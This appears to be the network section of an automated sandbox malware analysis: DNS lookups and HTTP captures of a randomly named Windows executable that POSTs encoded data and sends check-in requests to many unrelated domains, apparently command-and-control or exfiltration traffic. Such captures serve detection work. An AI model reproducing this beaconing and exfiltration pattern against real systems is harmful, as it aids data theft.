                                May 28, 2024 07:16:12.932435036 CEST | 1.1.1.1 | 192.168.2.6 | 0xacd2 | No error (0) | 94950.bodis.com | | 199.59.243.225 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:26.562767982 CEST | 1.1.1.1 | 192.168.2.6 | 0xb1be | No error (0) | www.ceo-retreats.co.uk | | 46.30.215.104 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:39.835678101 CEST | 1.1.1.1 | 192.168.2.6 | 0x4b03 | No error (0) | www.mavonorm-global.uk | mavonorm-global.uk | | CNAME (Canonical name) | IN (0x0001) | false
                                May 28, 2024 07:16:39.835678101 CEST | 1.1.1.1 | 192.168.2.6 | 0x4b03 | No error (0) | mavonorm-global.uk | | 92.205.15.157 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:53.324561119 CEST | 1.1.1.1 | 192.168.2.6 | 0x9e7c | No error (0) | www.adhdphotography.com | adhdphotography.com | | CNAME (Canonical name) | IN (0x0001) | false
                                May 28, 2024 07:16:53.324561119 CEST | 1.1.1.1 | 192.168.2.6 | 0x9e7c | No error (0) | adhdphotography.com | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:53.324561119 CEST | 1.1.1.1 | 192.168.2.6 | 0x9e7c | No error (0) | adhdphotography.com | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:06.736654997 CEST | 1.1.1.1 | 192.168.2.6 | 0x15f4 | No error (0) | www.allgiftedmalaysia.com | | 216.40.34.41 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:20.383970022 CEST | 1.1.1.1 | 192.168.2.6 | 0xac30 | No error (0) | www.shortput.top | | 203.161.43.227 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:33.821358919 CEST | 1.1.1.1 | 192.168.2.6 | 0x8543 | No error (0) | www.cuddle-paws.co.uk | cuddle-paws.co.uk | | CNAME (Canonical name) | IN (0x0001) | false
                                May 28, 2024 07:17:33.821358919 CEST | 1.1.1.1 | 192.168.2.6 | 0x8543 | No error (0) | cuddle-paws.co.uk | | 185.229.21.229 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:47.261409044 CEST | 1.1.1.1 | 192.168.2.6 | 0x5341 | No error (0) | www.home-stroi0m.ru | | 178.63.50.103 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:18:01.704238892 CEST | 1.1.1.1 | 192.168.2.6 | 0x8aa4 | No error (0) | www.betopfloor.com | betopfloor.com | | CNAME (Canonical name) | IN (0x0001) | false
                                May 28, 2024 07:18:01.704238892 CEST | 1.1.1.1 | 192.168.2.6 | 0x8aa4 | No error (0) | betopfloor.com | | 108.179.192.228 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:18:15.189414024 CEST | 1.1.1.1 | 192.168.2.6 | 0x80b4 | No error (0) | www.bade.ink | | 149.88.84.60 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:18:49.367676973 CEST | 1.1.1.1 | 192.168.2.6 | 0xcbce | No error (0) | www.futurereadyteaming.com | futurereadyteaming.com | | CNAME (Canonical name) | IN (0x0001) | false
                                May 28, 2024 07:18:49.367676973 CEST | 1.1.1.1 | 192.168.2.6 | 0xcbce | No error (0) | futurereadyteaming.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:18:49.367676973 CEST | 1.1.1.1 | 192.168.2.6 | 0xcbce | No error (0) | futurereadyteaming.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.6 | 49711 | 188.114.97.3 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:19.255884886 CEST | 475 | OUT | GET /07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ= HTTP/1.1
                                Host: www.ilodezu.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:15:20.921492100 CEST | 539 | IN | HTTP/1.1 567 unknown
                                Date: Tue, 28 May 2024 05:15:20 GMT
                                Content-Length: 17
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m6mVSsi7gdUdjw7eVToqE9ze9zuDS1qUiNpFq3MQlhSc8r4q56mx4VIE7xmirjAIBkdqtPV4RbxAAGQD3gF6L91X3hKuU1ZN8q4mtnaNNqpPKjCZDdgDttPmN9zyjPQ8jOI%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88abc427e965425b-EWR
                                alt-svc: h2=":443"; ma=60
                                Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                Data Ascii: Request too large


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.6 | 49712 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:35.984015942 CEST | 749 | OUT | POST /hx08/ HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.vpachurch.org.uk
                                Referer: http://www.vpachurch.org.uk/hx08/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=zqq6gBpbljk19uPrG+dUN6xjtBzh9tPoYqb8HQCXoy0L7bkHnuuAu3JZPww+ME6UAGb0VjER8VPhwMKlQe06i703c+PmvFySuUERddjhz03CjP84BkMzN2alM+yM7OrMGfqQXFBeRXdsKECIeIZzuHhv0IlzDgcp2vjsXvb7j1g59hoVjllNRWHddA/ITqMOGRXdqeMm56ji


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.6 | 49713 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:38.516274929 CEST | 773 | OUT | POST /hx08/ HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.vpachurch.org.uk
                                Referer: http://www.vpachurch.org.uk/hx08/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=zqq6gBpbljk18P/rHZxUPaxgxRzhodPsYqf8HVzKoggL664Hmq6Av3JZBQwiRU6fAGXGVjoR8VbhwJ2lQtM9gr0xEOPgilySuUERdd3Lz0vCj/g4ABg0EWamauyMxurAGfrgXAh0RVlsKEyIe5Z813hTwIkFOB4j2p6JQ+aaiU4B8XpP/WluDGnfdCn6TKMkERvd4JAB2OGBGXdgFu20wG+rbWxnzxj50w==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.6 | 49714 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:42.330183029 CEST | 1786 | OUT | POST /hx08/ HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.vpachurch.org.uk
                                Referer: http://www.vpachurch.org.uk/hx08/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=zqq6gBpbljk18P/rHZxUPaxgxRzhodPsYqf8HVzKohYL6IcHnISAs3JZJwwyRU6eAGOPVjUB8WjhibOlb8M9pr0xNuPlvFy9uUVYddnLz0vCj+Q4GUM0I2alM+yA7OrsGbGYXAtOSkFsKgeIcrx853hV9okNOBF52tSjQ+v3iWkBwTIkjSR2bnTtKlLuY9MAFwzyx6AnwPGxIDE8HMzHxFDCYQQmzFicrCf1tF5IuuCuhR0eLxeFHyQeITgK/FcJJzqLzuqTc1l663eMhQwG1inpzR1I/ikQUKj0jQbr/x44vqK62gOQa3Wjvfl2IyMLopbMVFLOMOPXd5Tv6LIcLWcUxDBf1+N1h3TW98UHKcOLRQD1QfjnKKTAYW8mTWK0j0Wy0P8c5TgDSKcD1bn0etGQJLZOeltK/8vGk64JmDkkshrbTasWwxSDyZcMpr95L0FVhpIruT70zEtD1pvthVGq6IQcBGUyLVRIzPBuK0Pqj/9U+4Cp3ohnzKL3Yf42EdM57f1kS+O+kL/iWHALrMvvDHJxlg7C+ZE3M7FzDiiG7vECTFrZXZObUnKnqczM4X8hzPoLQ2eSx46H9W1vw2TSr1k0o7NZ+yE9rOOzfky42dTRN2EbALzQ1lqtCY/jYA2g83KnRylJ7eCfwdtpGXe9PFWMQFwtsMVsRnK+P7vEzFbAm6HntjjCB0mo0en00mcJ6Vz2VLu7MeUXJEolajnlnjfCwdLZevIcljo8AN+3HX4YjPRDUc99Qk9ELrISsAp4YQyAy4X+b7iN/Tz7zFilbqvITGydcyPQTQvxTFO/Hcmhw+wpmcLkkMyFnc9lHcTTGQylabv6spdIIbqcxctpRJIlTBIJfRlnOiXQxhHTWWRw3piqLtuXHjXABYqSbbsgJj16YP/KZYuh63LXJC6P65IgEUPSrgMzSmPESAsCiliVoHqsOR7e8Q6mZQDW3QLJtXpGKYtbMcheht0n1LJP822HUC1j5KkyD46/jJapY/ [TRUNCATED]


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.6 | 49715 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:44.859586954 CEST | 480 | OUT | GET /hx08/?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0 HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:15:45.333337069 CEST | 408 | IN | HTTP/1.1 200 OK
                                Server: openresty
                                Date: Tue, 28 May 2024 05:15:45 GMT
                                Content-Type: text/html
                                Content-Length: 268
                                Connection: close
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0"}</script></head></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.6 | 49717 | 212.227.172.254 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:50.391688108 CEST | 734 | OUT | POST /9rbi/ HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.shopnaya.fr
                                Referer: http://www.shopnaya.fr/9rbi/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=Znl9a7yWN0RfBCo/UnLt46p+VqfcmakqhiQ+HjhzSNCvth3qZ/IhfumVujwwjoooS2SyW0I7hcG7x+URoBtlmPLG9A37GUb3rnfK9g6HaeWJ9jPsG5cFXrEfFei9IS61Nhzub5/Yd6g2s0/OQQq36fIzVRiFyExcjat08VEn81OGDeBjK8kjpkgdHvl1Nb/WOyRFgGe6iOF8
                                May 28, 2024 07:15:51.055104017 CEST | 423 | IN | HTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:50 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/
                                Expires: Tue, 28 May 2024 05:35:50 GMT
                                Cache-Control: max-age=1200
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.6 | 49718 | 212.227.172.254 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:52.921988964 CEST | 758 | OUT | POST /9rbi/ HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.shopnaya.fr
                                Referer: http://www.shopnaya.fr/9rbi/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=Znl9a7yWN0RfAjY/WETtvKp9Lafct6kuhiM+HhNZS5uvjhHqIK0hYumVmDw19YpqS2uQW1k7hcC7x8cR9iFigfL+wg35I0b3rnfK9kTqae+J9QXsGcoGaLEeCei9fi6LNhzYb8Xyd5Y2s0PORE+0tPI1RRji3HMWlYsQ1FZGp1GAGoA5WPkA70AfHt9HN7/8MypFyRSdt6gfd8rQBQa2Wb7kv7HPWJKqCg==
                                May 28, 2024 07:15:53.575499058 CEST | 423 | IN | HTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:53 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/
                                Expires: Tue, 28 May 2024 05:35:53 GMT
                                Cache-Control: max-age=1200
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                7 | 192.168.2.6 | 49719 | 212.227.172.254 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:55.469028950 CEST | 1771 | OUT | POST /9rbi/ HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.shopnaya.fr
                                Referer: http://www.shopnaya.fr/9rbi/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=Znl9a7yWN0RfAjY/WETtvKp9Lafct6kuhiM+HhNZS46vjTPqZdghZumVojw09YprSy6UW1YRheK7yZIRszFiufL+vw34GUavrnPO9g3qae+J9RnsWZcGYLEfFei5IS7mNh7Ib8bIdJ42tUfOSxq0uvI3cxj63HAVlYwy1GErpy2AE8tFJ+cftlkHTvZZW+LAUz1pzw7rkK51QqmOIj32bZLuhuTYTNTHRk2+o874JeZTTzmdYRguPJRvf3+/VT7jhQqpBOy03LBf8HDhrfQU9CgRoimoreJLKsXOKNzK7XOWJ9zSZ8m1TcMU/zKttcwWithLqTgjyhcp943JbwarkXreJuVIDe/VppOSn/cba/uc5zzlqoEsDK4PQs7khhhZj+u+/JGQj6PtgVsw7F4+w8miFrf8/pr5BsAI78A+gb0HwdpQqSYyYsvVR1ObQ6BHmg4lVYiyRzpU2e7cIBeyGv+RvxdhPIM82fi0SQm7DGzlNnkh7XswfVm+3PLRtMk9HDBDqe6FUPGWXHTWsGpxPTC3UjU6/03KX7eSPBvIs3yXcughFg1vWmJoaCkBlhBeGXo5jxHvPU/IK+CfuPX3epZ2F2x45rKyo2Swwaab1qIuPbxXnKZsMJTIB0L1VzWObRjgVmtPI2C9qPm4bM9/uBEGE6+ZEYRnUsBtyL9WyjOPB6FICk1DRkPaW36iChgwwDW+WZsuFOX49S6V1QDMdrktujN5ayRjoZw279gUrkV9KUfb5aMeCaz4d/jrD4msm2p5jwtj9ZyplTCfVGl9MQuLadC+iZVH6xBy2PTb7+N6vkm4BoN8omFxjQuaVid9q7YBkQ3dShblTmp3m2CCfP6xWXM7QPEwXQDyAoVjF7hb3OKphHzcLq0cBomAOEbIYchGzz4gH0FBUTtIhiOy9FrsET7Olt76mr1zHrh1TIC2lFifPcueneRG1sUuCOys2yI2F9jEh9aazWKYE4k4Fm9sMOUknVkzgmfD26gEOFbUKL [TRUNCATED]
                                May 28, 2024 07:15:56.103212118 CEST | 423 | IN | HTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:56 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/
                                Expires: Tue, 28 May 2024 05:35:56 GMT
                                Cache-Control: max-age=1200
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                8 | 192.168.2.6 | 49720 | 212.227.172.254 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:15:58.304367065 CEST | 475 | OUT | GET /9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs= HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:15:58.947814941 CEST | 577 | IN | HTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:58 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs=
                                Expires: Tue, 28 May 2024 05:35:58 GMT
                                Cache-Control: max-age=1200
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                9 | 192.168.2.6 | 49721 | 199.59.243.225 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:12.940994978 CEST | 743 | OUT | POST /gy0x/ HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.etrading.cloud
                                Referer: http://www.etrading.cloud/gy0x/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=n1F1pgZhRoZa5YEFtpKH5lxt1EG948PG+6VL23uWRRkbcDIZQMQ6oMD4pYEp1j2ypo0kQxiw5Su3UO05qkuEbor7bL2BZq/GHb+RDqjJqagwvvvnWf1xOCNFhaHBdPCxmWtxRoGUJV5DtigFqaXERWeQAdo3GJH5s71X/WISnl9NDCGve7KvaBfu5+kj2HW6AWO05TyLnHiD
                                May 28, 2024 07:16:13.409863949 CEST | 1236 | IN | HTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1122
                                x-request-id: 410a49e8-dbee-46da-88d5-7515d0b9583a
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==
                                set-cookie: parking_session=410a49e8-dbee-46da-88d5-7515d0b9583a; expires=Tue, 28 May 2024 05:31:13 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:13.409884930 CEST | 575 | IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDEwYTQ5ZTgtZGJlZS00NmRhLTg4ZDUtNzUxNWQwYjk1ODNhIiwicGFnZV90aW1lIjoxNzE2ODczMz


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                10 | 192.168.2.6 | 49722 | 199.59.243.225 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:15.498663902 CEST | 767 | OUT | POST /gy0x/ HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.etrading.cloud
                                Referer: http://www.etrading.cloud/gy0x/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=n1F1pgZhRoZars4FhueHxlxy6kG9tMPC+6ZL2yeGRjwbdhQZTO46tMD4h4Es4D25po5bQz2w5Sq3UOE5qz6DJIr1Ob2DEa/GHb+RDuLvqaIwoffnRO1yQSNGmaHBOfC1mWsmRqiuJXBDtg4F7ovHLGeWEdpWJI+bgrkJhkYY4GlLC0H1CIKMIR/s588R2nWQCW20rE+sozHg2cPMWKmKvsTAKa1PZsV5Qg==
                                May 28, 2024 07:16:15.989741087 CEST | 1236 | IN | HTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:15 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1122
                                x-request-id: a0e5c95c-f916-4fe1-b652-9dd4f0af39ef
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==
                                set-cookie: parking_session=a0e5c95c-f916-4fe1-b652-9dd4f0af39ef; expires=Tue, 28 May 2024 05:31:15 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:15.989758015 CEST | 575 | IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTBlNWM5NWMtZjkxNi00ZmUxLWI2NTItOWRkNGYwYWYzOWVmIiwicGFnZV90aW1lIjoxNzE2ODczMz


